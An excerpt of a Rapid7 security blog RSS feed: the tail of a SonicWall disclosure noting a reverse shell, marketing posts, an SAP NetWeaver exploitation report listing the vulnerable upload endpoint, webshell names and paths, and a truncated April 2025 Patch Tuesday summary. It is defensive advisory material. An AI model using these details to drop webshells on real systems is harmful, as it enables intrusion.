------WebKitFormBoundaryXOj6BtGNhEubdWvN--
</pre><p>One minute later, our reverse shell arrives and root-level remote code execution is confirmed.</p><p><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf4b3cfe57acf394d/68497f5976d324918738a514/blog-sonicwall-12.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="blog-sonicwall-12.png" asset-alt="blog-sonicwall-12.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf4b3cfe57acf394d/68497f5976d324918738a514/blog-sonicwall-12.png" data-sys-asset-uid="bltf4b3cfe57acf394d" data-sys-asset-filename="blog-sonicwall-12.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="blog-sonicwall-12.png" sys-style-type="display"/></p><h2>Disclosure timeline</h2><ul><li><strong>May 2, 2025:</strong> Rapid7 shares vulnerability details with SonicWall security contacts. The SonicWall team acknowledges the disclosure 30 minutes later and confirms that patch development work will begin.</li><li><strong>May 4, 2025:</strong> The SonicWall security team states that a fixed build will be shared on May 5 for patch validation.</li><li><strong>May 5, 2025:</strong> The SonicWall security team shares the 10.2.1.15 build with Rapid7. The Rapid7 team validates that the patch is effective.</li><li><strong>May 6, 2025:</strong> The SonicWall security team states that the patch will be targeting a May 7 release date.</li><li><strong>May 7, 2025:</strong> SonicWall releases v10.2.1.15 and publishes a <a href="https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0011">security advisory</a>. After confirming the patch is generally available, Rapid7 publishes this disclosure.</li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/05/07/multiple-vulnerabilities-in-sonicwall-sma-100-series-2025</link>
      <guid isPermaLink="false">blt01963c6a0e0d958f</guid>
      <category><![CDATA[Vulnerability Disclosure]]></category>
      <category><![CDATA[Vulnerability Management]]></category>
      <category><![CDATA[Research]]></category><dc:creator><![CDATA[Ryan Emmons]]></dc:creator>
      <pubDate>Wed, 07 May 2025 20:18:06 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt11e9686cec540b6e/6849381f7431da65da41b88f/post-hero-vulnerability.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Exploring an Untethered, Unified Approach to CTEM]]></title>
      <description><![CDATA[<p>We live in a world where traditional Vulnerability Management (VM) has become infosec’s version of ‘whack-a-mole’— an attempt to tackle risks that constantly shift, multiply, and morph. As organizations push workloads to the cloud, offer customers digital experiences, or as they build AI-enabled applications across  their business, the <a href="/fundamentals/attack-surface/">attack surface</a> expands exponentially. For decades, security teams have relied on traditional network and endpoint-based scanners to discover and patch CVEs, but the reality is attackers don’t think in terms of “<a href="/fundamentals/common-vulnerabilities-and-exposures-cve/">CVEs</a>”—they think in <a href="/fundamentals/attack-path-analysis/">attack paths</a><strong>.</strong></p><p>The most successful hackers increase the blast radius and impact of their attacks by connecting key dots across your organization:</p><ul><li>Weak access controls to high-privilege users.</li><li>Misconfigurations to mission-critical assets.</li><li>Known exploits to number of impacted systems.</li></ul><p>To tame this complicated, quickly-evolving threat landscape, security teams are moving from ticking boxes for vulnerabilities patched, to understanding, contextualizing, and preempting real-world threats before they become breaches. The strategic shift has fueled the rise of <a href="/fundamentals/vulnerability-management-and-scanning/">Risk-Based Vulnerability Management (RBVM)</a> and <a href="/fundamentals/what-is-continuous-threat-exposure-management-ctem/">Continuous Threat Exposure Management (CTEM)</a>.</p><p>However, many organizations implement these approaches through an array of point security solutions - vulnerability scanners, endpoint detection software, penetration testing - and feed this data into one or more aggregation tools (usually <a href="/fundamentals/siem/">SIEMs</a>). This fragmented approach has inadvertently paved the way for tool sprawl, operational silos, and security blind spots. In this blog, I’ll explore why RBVM and CTEM have become essential security strategies, common mistakes that organizations make in implementation, and why these shortcomings have fueled the demand for unified exposure management.</p><h2>Navigating the peaks and plateaus of RBVM and CTEM</h2><p>RBVM helps teams prioritize remediation based on exploitability, criticality, and threat intelligence, rather than relying solely on CVE severity scores. RBVM solutions typically ingest data from vulnerability scanners, external threat feeds, endpoint detection systems, and other security tools. Security analysts then correlate key findings against SIEM tools to determine which vulnerabilities are actively being exploited in their environment.</p><p>The key benefit? This approach reduces alert noise because it filters out low-risk vulnerabilities, enabling security teams to focus remediation efforts on the most critical threats.</p><p>However, RBVM approaches come with significant drawbacks:</p><ul><li>RBVM tools are not designed to perform scans or produce threat intel themselves.</li><li>Teams must integrate RBVM solutions into their existing security stack (SIEM, SOAR, EDR, cloud security tools) - a process that’s often complex, time-consuming, and costly.</li><li>Most critically, if there are assets that the RVBM services have no visibility into, they will not produce risk scores for them, creating an incomplete picture of your attack surface and inaccurate representation of true business threats.</li></ul><h2>The evolution to CTEM</h2><p>To continuously assess and validate exposures across the entire attack surface, organizations are turning to CTEM as a proactive strategy for mitigating ongoing risk. With real-time, continuous visibility into the attack surface and attack paths, security teams can prioritize remediation efforts based on the risks that impact business-critical systems. Despite the benefits of this more advanced approach, implementing CTEM with fragmented security tools creates significant challenges:</p><h3>Misleading view of the attack surface.</h3><p>Your security stack may have top-tier vulnerability scanners, EDR solutions, and CSPM tools, but if these tools aren’t talking to each other, you end up with an incomplete view of the attack paths that hackers would take. Leading CTEM approaches are underpinned by platforms that go beyond CVEs by incorporating misconfigurations, cloud entitlements, <a href="/fundamentals/shadow-it/">shadow IT</a>, <a href="/fundamentals/lateral-movement/">lateral movement</a> risks, and application security gaps to provide a comprehensive view of the attack surface.</p><h3>Lacking business content and impact analysis for prioritization.</h3><p>Security teams have to sort through alerts, false positives, and vulnerability scan results that often lack business context. Without a unified platform connecting vulnerability findings with risk scores and business impact, teams will struggle to accurately prioritize risk, leaving them spending valuable time remediating issues that do not actually impact business-critical systems. Organizations need to look across the entire attack surface, including internal and external-facing attack vectors, as well as telemetry signals like weak identity and access controls.</p><h3>Silos hinder incident response.</h3><p>Vulnerability dashboards and reports do not depict how an adversary would exploit a vulnerability. Organizations need an in-depth view of the attack path to understand, for example, how misconfigurations can result in disruptive domain compromise in the event of a breach. This insight helps security teams identify interconnected systems and organizational peers (e.g., application owners, cloud architects, developers, engineers, etc.) that they will need to coordinate with in case there is a breach.</p><h2>The driving force for a unified exposure management platform</h2><p>According to the 2023 Gartner® Technology Adoption Roadmap for Large Enterprises Survey, cybersecurity leaders indicated that on average their organizations had 43 tools in their cybersecurity product portfolios, and 5% of the leaders indicated their organizations had over 100 tools.” We believe that managing that many tools can be overwhelming, especially because security teams often operate their tools in silos. The ensuing sprawl creates blind spots that attackers can easily exploit. Instead of juggling multiple disconnected tools, forward-thinking organizations are embracing a unified approach to <a href="/fundamentals/what-is-exposure-management/">exposure management</a> with comprehensive platforms that deliver:</p><ul><li>Vulnerability management</li><li>CASM</li><li>EASM</li><li>Cloud security</li><li>Identity security</li><li>Threat intelligence</li></ul><p>Because many high-profile breaches start with compromised credentials or excessive privileges, the ideal exposure management platform maps critical assets against users with weak authentication protocols.</p><p>Security teams can no longer rely on a scan-and-patch approach; they need to stay ahead of attackers by continuously identifying, validating, and mitigating risks across the entire attack surface. If your security tools aren’t fully integrated, attackers will exploit what’s left exposed. CISOs, security architects, and SOC leaders are tackling this challenge by moving beyond traditional VM and adopting a unified exposure management strategy with <a href="/products/command/exposure-management/">Rapid7’s Exposure Command</a> Platform.</p><h2>Connecting the dots with Exposure Command</h2><p>Unlike traditional standalone VM, CASM, EASM, SIEM, or EDR tools that rely on proprietary agents, Exposure Command from Rapid7 brings it all together into one platform. With an inside-out and outside-in view of your risks, combined with trusted threat intelligence and a vendor agnostic approach to vulnerability aggregation, security teams gain a complete, end-to-end view of their attack surface.</p><p>Rapid7’s all-in-one Exposure Command platform goes even further by automatically mapping users, authentication protocols, and the criticality of the systems they can access. Armed with deep visibility into vulnerabilities and their impact to the business, organizations can leverage Rapid7’s Remediation Hub to address the risks that have the largest impact on their overall risk posture.</p><p>The paradigm has shifted - it’s no longer about chasing vulnerability patches, but about taking command and reducing risk across the business.</p><p>Ready to see the difference a unified approach can make? Check out the <a href="https://product-tour.rapid7.com/player/?demoId=3cc2ac91-5261-4ef6-8f07-03408bca26cb&amp;showGuide=true&amp;showGuidesToolbar=true&amp;showHotspots=true&amp;source=app">Rapid7 Exposure Command product trial</a> to learn more about our platform and dive deeper into our unified, modern approach to managing risk and remediating security threats.</p><p></p><p><em>Gartner, </em><a href="https://www.gartner.com/en/documents/6094327"><em>Infrastructure Security Primer for 2025, John Watts, Franz Hinner, 29 January 2025</em></a><em> (For Gartner subscribers only)</em></p><p><em>GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.</em></p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/05/07/exploring-an-untethered-unified-approach-to-ctem</link>
      <guid isPermaLink="false">blt3d9a33c51c379726</guid>
      <category><![CDATA[Exposure Command]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Joel Alcon]]></dc:creator>
      <pubDate>Wed, 07 May 2025 13:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7e39d171a3c47242/683de20e65b8eae213cc8d45/gettyimages-1566680995.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Three Takeaways from the Gartner® Report: How to Grow Vulnerability Management Into Exposure Management]]></title>
      <description><![CDATA[<p>Security leaders today face a harsh reality: traditional vulnerability management isn’t enough. Threat actors are evolving, attack surfaces are expanding, and organizations need a more proactive approach to stay ahead of risk. Latest research from Gartner, <em>How to Grow Vulnerability Management Into Exposure Management</em>, highlights the need for security teams to move beyond simply tracking vulnerabilities and embrace a more comprehensive approach to <a href="/fundamentals/what-is-exposure-management/">exposure management</a>.</p><p>At Rapid7, we are excited to offer complimentary access to this report and share our three key takeaways to help you modernize your security strategy.</p><h2>Takeaway 1: Vulnerability Lists Aren’t Enough—You Need Continuous Threat Exposure Management (CTEM)</h2><p>Gartner states: <em>"Creating prioritized lists of security vulnerabilities isn’t enough to cover all exposures or find actionable solutions. Security operations managers should go beyond vulnerability management and build a continuous threat exposure management program to more effectively scope and remediate exposures."</em></p><p>CTEM shifts the focus from merely identifying vulnerabilities to understanding the full picture of organizational risk. It integrates asset visibility, business impact analysis, attack surface monitoring, and validation of security controls to help organizations assess and reduce their true exposure to threats.</p><h2>Takeaway 2: Exposure Management Requires Business Context</h2><p>One of the biggest challenges in vulnerability management today is that many security teams focus too much on discovering issues without evaluating their impact on the business. Gartner highlights the importance of integrating business context into security operations, stating that <em>"adding a business context, such as asset value and impact of compromise, to exposure management activities can improve senior leadership engagement."</em></p><p>By aligning security initiatives with business priorities, organizations can:</p><ul><li>Focus on the vulnerabilities that pose the greatest risk to critical operations</li><li>Improve communication with senior leadership and stakeholders</li><li>Justify security investments with real business impact</li></ul><h2>Takeaway 3: Attack Surface Visibility Must Keep Up With Digital Evolution</h2><p>Modern attack surfaces extend far beyond on-premises IT. The rise of cloud applications, IoT, supply chain dependencies, and remote work environments has dramatically increased the number of potential entry points for attackers. Gartner emphasizes that <em>"current approaches to attack surface visibility are not keeping up with the rapid pace of digital evolution. Organizations must quickly reduce exposure to make their public-facing assets less visible and accessible."</em></p><p>This means security teams need to enhance their discovery processes to:</p><ul><li>Continuously monitor both their internal and external attack surface</li><li>Identify misconfigurations, exposed assets, emerging threats, and weak access controls (e.g., credentials, risky users)</li><li>Implement proactive security measures to reduce overall exposure</li></ul><h2>How Rapid7 Aligns with Gartner Exposure Management Vision</h2><p>At Rapid7, we believe in empowering security teams with the tools and insights they need to shift from reactive vulnerability management to proactive exposure management. Our <strong>Exposure Management solution</strong> helps organizations:</p><ul><li>Gain real-time visibility into evolving attack surfaces</li><li>Prioritize threats based on business impact and exploitability</li><li>Continuously validate security controls through adversarial exposure testing</li></ul><p>As threats continue to evolve, organizations must rethink how they approach vulnerability management. Gartner research provides a roadmap for security leaders looking to implement a comprehensive exposure management strategy.</p><p><a href="/lp/how-to-grow-vulnerability-management-into-exposure-management/?utm_source=blog&amp;utm_medium=website&amp;utm_content=launch-blog&amp;utm_campaign=global-exco-how-to-grow-vm-into-exposure-management-prospect-eng-exp-risk-25">Download the full Gartner report today </a>to learn how you can modernize your security program and stay ahead of threats.</p><p></p><p></p><p><em>Garter, How to Grow Vulnerability Management Into Exposure Management, Michell Schneider, Jeremy D’Hoinne, Jonathan Nunez, Craig Lawson, 8 November 2024</em></p><p><em>GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved.</em></p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/04/30/three-takeaways-from-the-gartner-r-report-how-to-grow-vulnerability-management-into-exposure-management</link>
      <guid isPermaLink="false">blt823a7f333b039de1</guid>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Wed, 30 Apr 2025 13:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2629b09b83c26472/683ddff9c26e075d5528e73a/gettyimages-2194784990.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Active exploitation of SAP NetWeaver Visual Composer CVE-2025-31324]]></title>
      <description><![CDATA[<p>On Thursday, April 24, enterprise resource planning company SAP published a CVE (and a day later, an <a href="https://me.sap.com/notes/3594142">advisory</a> behind login) for <a href="https://attackerkb.com/topics/tPQvTA8bJh/cve-2025-31324">CVE-2025-31324</a>, a zero-day vulnerability in NetWeaver Visual Composer that carries a CVSSv3 <a href="https://nvd.nist.gov/vuln/detail/CVE-2025-31324">score</a> of 10. The vulnerability arises from a missing authorization check in Visual Composer’s Metadata Uploader component that, when successfully exploited, allows unauthenticated attackers to send specially crafted POST requests to the /developmentserver/metadatauploader endpoint, resulting in unrestricted malicious file upload.</p><p>While the vulnerable component is not installed in NetWeaver’s default configuration, SAP security firm Onapsis <a href="https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/">notes</a> that it is widely enabled.</p><p>Per <a href="https://help.sap.com/docs/SAP_NETWEAVER_702/ff55ab4f6c5510149ce7df0d5dc0da07/475e1e766518427fe10000000a42189d.html">SAP’s docs</a>, Visual Composer “operates on top of the SAP NetWeaver Portal, utilizing the portal's connector-framework interfaces to enable access to a range of data services, including SAP and third-party enterprise systems. In addition to accessing SAP Business Suite systems, users can access SAP NetWeaver Business Warehouse and any open/JDBC stored procedures.”</p><h2>Rapid7-observed exploitation</h2><p>CVE-2025-31324 is being actively exploited in the wild; Rapid7 MDR has observed exploitation in multiple customer environments dating back to at least March 27, 2025, nearly all of which has targeted manufacturing companies. Adversaries have exploited the vulnerability to drop webshells in the following directory: j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root/</p><p>Public threat intelligence on CVE-2025-31324 exploitation has <a href="https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/">highlighted</a> the use of webshells named helper.jsp and cache.jsp. With few exceptions (like helper.jsp), most webshells Rapid7 has observed had random 8-character names, e.g.:<br/>cglswdjp.jsp<br/>ijoatvey.jsp<br/>dkqgcoxe.jsp<br/>ylgxcsem.jsp<br/>cpyjljgo.jsp<br/>tgmzqnty.jsp</p><p>Rapid7 has not attributed this activity to a specific threat actor at time of writing.</p><h2>Mitigation guidance</h2><p><strong>All</strong> SAP NetWeaver 7.xx versions and service packs (SPS) are affected.</p><p>SAP’s non-public guidance indicates that customers can check system info (<a href="http://host">http://host</a>:port/nwa/sysinfo) for the Software Component VISUAL COMPOSER FRAMEWORK (VCFRAMEWORK.SCA). If this check returns no results, SAP has said the vulnerability is “not relevant for that system.”</p><p>Customers should update to the latest version of NetWeaver AS on an emergency basis, without waiting for a regular patch cycle to occur. <strong>Note that updating to a fixed version of NetWeaver will not address pre-existing compromises.</strong> Customers who are unable to update to a fixed version of the application should disable Visual Composer by following SAP’s <a href="https://me.sap.com/notes/2501341">directions here</a>.</p><p>Customers should also restrict access to the affected endpoint (/developmentserver/metadatauploader) and investigate their environments for signs of compromise. SAP’s non-public advisory notes that the “most common targets for an attacking agent” are the following paths under the JAVA server file system — jsp, java, or class files present directly in these paths should be considered malicious: C:\usr\sap\&lt;SID&gt;\&lt;InstanceID&gt;\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\root C:\usr\sap\&lt;SID&gt;\&lt;InstanceID&gt;\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work C:\usr\sap\&lt;SID&gt;\&lt;InstanceID&gt;\j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work\sync</p><p>For additional information and the latest guidance, please refer to SAP’s non-public materials or contact SAP support.</p><h2>Rapid7 customers</h2><p>InsightIDR and Managed Detection and Response customers have existing detection coverage through Rapid7's expansive library of detection rules. Rapid7 recommends installing the Insight Agent on all applicable hosts to ensure visibility into suspicious processes and proper detection coverage. Below is a non-exhaustive list of detections that are deployed and will alert on behavior related to exploitation of this vulnerability:</p><ul><li>Attacker Technique - Enumerating Domain Or Enterprise Admins With Net Command</li><li>Suspicious Process - Nltest Enumeration Cluster</li><li>PowerShell - Download File to Staging Directory</li></ul><p>InsightVM and Nexpose customers can assess their exposure to CVE-2025-31324 with an unauthenticated check available in the April 28, 2025 content release.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/04/28/etr-active-exploitation-of-sap-netweaver-visual-composer-cve-2025-31324</link>
      <guid isPermaLink="false">blte7d4b32c479ad520</guid>
      <category><![CDATA[Emergent Threat Response]]></category>
      <category><![CDATA[Detection and Response]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Caitlin Condon]]></dc:creator>
      <pubDate>Mon, 28 Apr 2025 11:57:12 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt1083dca4c4e27e90/683ddf18e3c8aac62b830d0a/emergent-threat-banner.jpeg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Following the News: MITRE’s Common Vulnerabilities and Exposures (CVE) Funding]]></title>
      <description><![CDATA[<h2>The current situation</h2><p>On April 16, CISA <a href="https://www.nextgov.com/cybersecurity/2025/04/cisa-extends-mitre-backed-cve-contract-hours-its-lapse/404601/">extended funding</a> to ensure no continuity issues with the critical <a href="/fundamentals/common-vulnerabilities-and-exposures-cve/">Common Vulnerabilities and Exposures (CVE)</a> program. This was in response to a letter sent by MITRE on April 15 to CVE board members warning of a potential issue with MITRE's support for the CVE program. MITRE administers the global CVE program, which provides the human and technological infrastructure to reserve, publish, modify, and dispute CVEs. </p><p>Rapid7 continues to monitor both public and private discussions closely in its capacity as a CVE Numbering Authority (CNA) and as a longtime leader and participant in the CVE ecosystem.</p><h2>How this could impact Rapid7 and our customers</h2><p>Since funding has been <a href="https://www.nextgov.com/cybersecurity/2025/04/cisa-extends-mitre-backed-cve-contract-hours-its-lapse/404601/">extended</a> for the next 11 months, there is no current impact. Rapid7 will continue to monitor the situation to ensure there is no future impact to our customers' ability to use our platform to accurately assess their environment for vulnerabilities.</p><p>Rapid7’s multi-layered approach to vulnerability detection, creation, and risk scoring means that our products are not completely reliant on any single source of information. This was something we pointed to last year, when we <a href="/blog/post/2024/03/18/rapid7-offers-continued-vulnerability-coverage-in-the-face-of-nvd-delays/">assured customers</a> of our continued vulnerability coverage in the face of NIST’s National Vulnerability Database delays.</p><h2>The importance of MITRE and the CVE Program</h2><p>The CVE program is critical infrastructure for modern vulnerability identification, tracking, management, and resolution. CVEs are used for risk identification, commercial and open-source tooling, <a href="/fundamentals/vulnerability-management-and-scanning/">vulnerability management</a> workflows, security and academic research, threat intel production, <a href="/fundamentals/incident-response/">incident response</a>, and many other applications worldwide. </p><p>Rapid7 thanks and supports the MITRE organization as well as the extended ecosystem of industry collaborators who have worked diligently for the past 25 years to ensure the CVE program's utility and integrity for the broader community.</p><p>We will continue to monitor the situation and will update this blog with any relevant developments. If you have any questions, please <a href="/contact/#contacts">reach out</a>.</p>]]></description>
      <link>https://www.rapid7.com/blog/post/2025/04/16/following-the-news-mitres-common-vulnerabilities-and-exposures-cve-funding</link>
      <guid isPermaLink="false">blt56b43196d17a482c</guid>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Wed, 16 Apr 2025 14:56:15 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3f2b1b0ba24a7289/683dddcf70aa951b06fe2fa1/gettyimages-2154249245--1-.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Patch Tuesday - April 2025]]></title>
      <description><![CDATA[<p>Microsoft is addressing 121 vulnerabilities this <a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Apr">April 2025 Patch Tuesday</a>, which is more than twice as many as last month. Microsoft has evidence of in-the-wild exploitation for just one of the vulnerabilities published today, which is already reflected in <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog">CISA KEV</a>. Once again, Microsoft has published zero-day vulnerabilities on Patch Tuesday without evaluating any of them as critical severity at time of publication, so that’s now a seven month unbroken streak. Today also sees the publication of 11 critical <a href="/fundamentals/what-is-remote-code-execution-rce/">remote code execution (RCE)</a> vulnerabilities. 13 browser vulnerabilities have already been published separately this month, and are not included in the total.</p><h3>CLFS: zero-day EoP</h3><p>The Windows Common Log File System (CLFS) Driver is firmly back on our radar today with <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-29824">CVE-2025-29824</a>, a zero-day local elevation of privilege vulnerability. First, the good news: the Acknowledgements section credits the Microsoft Threat Intelligence Center, so the exploit was successfully reproduced by Microsoft; the less-good news is that someone other than Microsoft was first to discover the exploit, because otherwise Microsoft wouldn’t be listing CVE-2025-29824 as exploited in the wild.</p><p>The advisory does not specify what privilege level is achieved upon successful exploitation, but it’ll be SYSTEM, because that’s the prize for all the other CLFS elevation of privilege zero-day vulnerabilities. As usual, some form of less-privileged local access is a pre-requisite, but attack complexity is low, so this is the sort of vulnerability which goes into any standard break-and-enter toolkit. Given the long history of similar vulnerabilities, it would be more surprising if exploit code <em>wasn’t</em> publicly available in the not-too-distant future.</p><p>Although <a href="/blog/post/2024/12/10/patch-tuesday-december-2024">December 2024 Patch Tuesday</a> seems as though it must have been a very long time ago, any standard calendar will tell us that only 119 days have elapsed since the last zero-day CLFS local elevation of privilege. Rapid7 <a href="/blog/post/2024/12/10/patch-tuesday-december-2024/#common-log-file-system-zero-day-eop">discussed</a> the history of CLFS zero-day elevation of privilege vulnerabilities at the time. All versions of Windows receive a patch, except for the venerable LTSC Windows 10 1507, which is listed on the advisory as vulnerable, but left out in the cold with no update; the FAQ says to check back later. <a href="https://learn.microsoft.com/en-us/windows/release-health/release-information">Windows 10 LTSC 1507 is scheduled for end of servicing on 2025-10-14</a>, so the clock is ticking regardless.</p><h3>LDAP Server: critical RCE</h3><p>Although it has been many months since we’ve seen a critical zero-day vulnerability from Microsoft, there is no shortage of critical remote code execution (RCE) vulnerabilities published today. Defenders responsible for an LDAP server — which means almost any organization with a non-trivial Microsoft footprint — should add patching for <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-26663">CVE-2025-26663</a> to their to-do list. With no privileges required, no need for user interaction, and code execution presumably in the context of the LDAP server itself, successful exploitation would be an attractive shortcut to any attacker. Anyone wondering if today is a re-run of December 2024 Patch Tuesday can take some small solace in the fact that the worst of the <a href="/blog/post/2024/12/10/patch-tuesday-december-2024/#ldap-critical-rce">trio of LDAP critical RCEs published at the end of last year</a> was likely easier to exploit than today’s example, since today’s <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-26663">CVE-2025-26663</a> requires that an attacker win a race condition. Despite that, Microsoft still expects that exploitation is more likely.</p><h3>LDAP Client: critical RCE</h3><p>If you breathe a sigh of relief when you see LDAP server critical RCE vulnerabilities like <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-26663">CVE-2025-26663</a>, because you’re certain that you don’t have any Windows LDAP servers in your estate, how about LDAP clients? <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-26670">CVE-2025-26670</a> describes a critical RCE in the LDAP client, although the FAQ confusingly states that exploitation would require an attacker to “send specially crafted requests to a vulnerable LDAP server”; this seems like it might be a data entry error on the advisory FAQ, so keep an eye out for an update to that section of the advisory. Assuming the rest of the advisory is all present and correct, exploitation requires that the attacker win a race condition, which keeps the attack complexity higher than it otherwise would be. While we wait for clarification, it’s still a critical RCE which Microsoft rates as “exploitation more likely”. On that basis, patching is always recommended.</p><h3>RDS: critical RCEs</h3><p>The prolific Windows vulnerability pioneers at Kunlun Lab are credited with a pair of critical RCE vulnerabilities in Windows Remote Desktop Services. Although both <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-27480">CVE-2025-27480</a> and <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-27482">CVE-2025-27482</a> share a CVSSv3 base score of 8.1, Microsoft has ranked them both as critical using its own proprietary severity ranking scale. Both vulnerabilities require that an attacker win a race condition. If you’ve ever read Microsoft’s guide to <a href="https://learn.microsoft.com/en-us/windows-server/remote/remote-desktop-services/remote-desktop-gateway-role">deploying the Remote Desktop Gateway role</a>, you probably have some systems to patch.</p><h3>Hyper-V: critical RCE</h3><p>Some Microsoft security advisory FAQs provide a satisfying level of detail, whereas others raise more questions than they answer. <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-27491">CVE-2025-27491</a> is a Hyper-V critical RCE which falls into the second category, since it states that an attacker must be authenticated — no need for elevated privileges — but also that the attacker must send the user a malicious site and convince them to open it, and it’s not at all clear why authentication would be required in that case. Also unusual: the remediation table on the advisory lists several 32-bit versions of Windows as receiving patches, although <a href="https://learn.microsoft.com/en-us/windows-server/virtualization/hyper-v/system-requirements-for-hyper-v-on-windows?pivots=windows-server#general-requirements">Hyper-V requires a 64-bit processor</a> and a <a href="https://techcommunity.microsoft.com/blog/itopstalkblog/step-by-step-enabling-hyper-v-for-use-on-windows-10/267945">64-bit host OS</a>.</p><h3>Microsoft lifecycle update</h3><p>In Microsoft product lifecycle news, <a href="https://learn.microsoft.com/en-us/lifecycle/products/dynamics-gp-2015-r2">Dynamics GP 2015</a> moves past the end of extended support today. The next batch of significant lifecycle status changes are due in July 2025, when SQL Server 2012 ESU program draws to a close.</p><h2>Summary charts</h2><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt732160ed88763fe1/683ddc67543b8d63e7bf1052/image.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image.png" asset-alt="image.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt732160ed88763fe1/683ddc67543b8d63e7bf1052/image.png" data-sys-asset-uid="blt732160ed88763fe1" data-sys-asset-filename="image.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image.png" sys-style-type="display"/></figure><figure><img src="/content/images/2025/04/image-1.png" alt="A bar chart showing the distribution of vulnerabilities by affected component for Microsoft Patch Tuesday April 2025." captionAttrs="[object Object]" caption="Elevated amounts of elevation of privilege" width="auto" style="width: auto; height: auto;" /><figcaption>Elevated amounts of elevation of privilege</figcaption></figure><img src="/content/images/2025/04/image-2.png" alt="A heatmap showing the distribution of vulnerabilities by impact and affected component for Microsoft Patch Tuesday April 2025." width="auto" style="width: auto; height: auto;" /><h2>Summary tables</h2><h3>Apps vulnerabilities</h3><table cols="5" colWidths="250,250,250,250,250"><thead><tr><th>CVE</th><th>Title</th><th>Exploited?</th><th>Publicly disclosed?</th><th>CVSSv3 base score</th></tr></thead><tbody><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29805">CVE-2025-29805</a></td><td>Outlook for Android Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>7.5</td></tr></tbody></table><h3>Azure vulnerabilities</h3><table cols="5" colWidths="250,250,250,250,250"><thead><tr><th>CVE</th><th>Title</th><th>Exploited?</th><th>Publicly disclosed?</th><th>CVSSv3 base score</th></tr></thead><tbody><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-27489">CVE-2025-27489</a></td><td>Azure Local Elevation of Privilege Vulnerability</td><td>No</td><td>No</td><td>7.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-26628">CVE-2025-26628</a></td><td>Azure Local Cluster Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>7.3</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-25002">CVE-2025-25002</a></td><td>Azure Local Cluster Information Disclosure Vulnerability</td><td>No</td><td>No</td><td>6.8</td></tr></tbody></table><h3>Browser vulnerabilities</h3><table cols="5" colWidths="250,250,250,250,250"><thead><tr><th>CVE</th><th>Title</th><th>Exploited?</th><th>Publicly disclosed?</th><th>CVSSv3 base score</th></tr></thead><tbody><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-25000">CVE-2025-25000</a></td><td>Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>8.8</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29815">CVE-2025-29815</a></td><td>Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability</td><td>No</td><td>No</td><td>7.6</td></tr><tr><td><a target="_blank" href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-29796">CVE-2025-29796</a></td><td>Microsoft Edge for iOS Spoofing Vulnerability</td><td>No</td><td>No</td><td>4.7</td></tr><tr><td><a 